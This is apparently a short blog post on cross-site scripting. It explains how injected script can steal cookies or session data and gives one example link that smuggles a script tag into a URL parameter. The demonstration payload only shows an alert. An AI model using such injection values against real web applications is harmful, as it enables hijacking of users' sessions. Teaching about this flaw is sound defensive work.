- A web site may be vulnerable if there is a provision for a user to enter javascript through input fields and the inserted data is viewed by another webpage in HTML tags (not in TextArea or TextFields).
- If there is such a case of displaying the data on a webpage, then the attacker can input the malicious script into database, which hijacks the cookie or session information when executed.
- When we see the inputted data through another webpage - the script runs, collects the session info and passes the info to the attacker’s website.
An User can be tricked to click a hyperlink, which upon clicking inserts the script into application and executes in application domain bypassing the browser security restrictions.
Ex:
1) WebApp runs on http://webappdomain/webapp/ and a User is logged in.
2) From another website/email or from any other source, a user can be tricked to click the following url.
3) The hyperlink with script if clicked, can execute the script under the domain (webappdomain/webapp/).
<a href="”http://webappdomain/webapp/getdetails?clientno="1&station="1&code="1<SCRIPT">alert(’Hi’); </script>”>http://webappdomain/webapp/xxxx.jsp</a>
4) If the page, which is loaded by the above click, prints the parameter ‘code’ on the webpage, then the scripts gets injected into the webpage and executes.
No comments:
Post a Comment